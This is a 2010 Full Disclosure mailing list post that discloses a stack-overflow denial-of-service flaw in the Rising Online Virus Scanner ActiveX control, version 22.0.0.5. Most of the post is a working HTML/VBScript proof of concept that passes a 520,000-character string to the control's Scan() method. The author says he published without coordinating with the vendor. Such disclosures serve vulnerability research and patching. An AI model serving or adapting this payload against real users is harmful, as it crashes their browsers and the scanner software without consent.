Full Disclosure mailing list archives
Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)
From: wirebonder 42 <wirebonder42 () googlemail com>
Date: Wed, 17 Feb 2010 16:46:54 +0100
# Exploit Title: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow) # Date: 17/02/2010 # Author: wirebonder # Software Link: http://www.rising-global.com/products/online-scanner-intro.html # Version: 22.0.0.5 # Tested on: Windows XP sp3 # CVE : n/a # Code : ## # ProgID: RavOLCtlLib.RavOnline # ClassID: 9FAFB576-6933-4CCC-AB3D-B988EC43D04E # Member: Scan() # File: C:\Programme\Rising\RavOL\RavOLCtl.dll # script safe: true # init safe: true # # Because Bullshit like this is unsaleable and i don't want to waste time # coordinating patches with this vendor this is a fulldisc publishing. ## <html> <body> <object classid='clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E' id='obj'></object> <script language='vbscript'> buf=String(520000, "A") obj.Scan buf </script> </body> </html>
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Rising Online Virus Scanner ActiveX Control DoS (Stack overflow) wirebonder 42 (Feb 17)